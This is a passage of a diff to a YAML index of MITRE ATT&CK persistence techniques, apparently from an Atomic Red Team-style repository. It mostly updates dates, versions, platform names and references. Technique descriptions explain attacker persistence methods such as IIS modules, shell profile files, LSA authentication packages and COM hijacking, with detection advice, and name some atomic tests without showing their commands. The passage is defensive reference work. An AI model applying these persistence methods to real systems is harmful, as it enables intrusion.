+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -57063,7 +57479,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -57137,11 +57552,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -57158,7 +57572,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -57168,7 +57581,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -57177,19 +57590,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -57237,11 +57648,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -57270,24 +57682,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -57322,9 +57736,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -57384,7 +57795,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -57409,8 +57820,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests:
     - name: Install IIS Module using AppCmd.exe
@@ -57489,7 +57898,7 @@ persistence:
         name: powershell
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -57542,8 +57951,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -57591,7 +58000,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests:
     - name: Persistence with Custom AutodialDLL
@@ -57807,73 +58215,7 @@ persistence:
         elevation_required: true
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -57921,6 +58263,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -57931,9 +58277,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -57942,8 +58292,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -57980,7 +58389,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -58003,7 +58412,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests:
     - name: Authentication Package
@@ -58026,7 +58434,7 @@ persistence:
         elevation_required: true
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -58104,7 +58512,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests:
     - name: COM Hijacking - InprocServer32
@@ -58247,36 +58654,7 @@ persistence:
         name: powershell
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -58285,22 +58663,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests:
     - name: Install Outlook Home Page Persistence
@@ -58338,7 +58743,7 @@ persistence:
           '
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -58399,7 +58804,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests:
     - name: Execution of program.exe as service with unquoted service path
@@ -58471,7 +58875,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -58493,7 +58897,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -58574,7 +58977,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -58597,7 +58999,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -58627,12 +59029,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -58722,7 +59122,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests:
     - name: Bitsadmin Download (cmd)
@@ -58852,7 +59251,7 @@ persistence:
         name: command_prompt
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -58937,7 +59336,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests:
     - name: Install AppInit Shim
@@ -59061,7 +59459,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests:
     - name: Set Arbitrary Binary as Screensaver
@@ -59100,13 +59497,13 @@ persistence:
         elevation_required: true
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -59139,10 +59536,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -59179,7 +59575,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -59253,7 +59648,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -59281,12 +59676,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -59345,33 +59739,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
